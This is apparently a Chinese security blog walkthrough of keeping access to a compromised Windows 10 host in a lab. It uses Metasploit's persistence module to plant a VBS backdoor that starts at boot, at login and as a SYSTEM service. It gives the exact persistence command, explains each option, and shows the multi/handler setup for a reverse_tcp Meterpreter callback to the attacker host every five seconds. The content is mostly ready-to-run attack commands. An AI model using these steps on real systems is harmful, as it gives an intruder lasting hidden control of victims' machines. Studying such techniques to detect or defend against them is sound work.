返回首页
EN
H7 / SECURITY RESEARCH NOTES

通过MSF persistence后门创建vbs后门实现Windows权限维持

环境说明

IPHOSTNAMENOTE
172.16.106.67Kali Linux攻击者主机
10.10.10.88Windows 10受害者主机

首先拿到受害者主机权限

  • 如图所示可以看到攻击者主机172.16.106.67获取到了10.10.10.88受害者主机的控制权限。

使用msf persistence模块创建后门

run persistence -S -U -X -i 5 -p 2334 -r 172.16.106.67

# 参数详解:
-A 自动启动匹配的exploit/multi/handler 连接到代理
-L <opt> 目标主机中要写入有效负载的位置,如果没有,将使用 %TEMP%。
-P <opt> 要使用的有效负载,默认为 windows/meterpreter/reverse_tcp。
-S 在启动时自动启动代理作为服务(具有 SYSTEM 权限)
-T <opt> 要使用的备用可执行模板
-U 用户登录时自动启动代理
-X 系统启动时自动启动代理
-h 帮助菜单
-i <opt> 每次连接尝试之间的时间间隔(以秒为单位)
-p <opt> 运行 Metasploit 的系统正在监听的端口
-r <opt> 运行 Metasploit 的系统的 IP 监听连接

  • 如下图可以看到vbs脚本已在windows受害者主机上创建

攻击机开启监听

  • 受害者主机每5秒做一次回连
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.16.106.67
set lport 2334
exploit
  • 如下图监听2334端口,成功上线: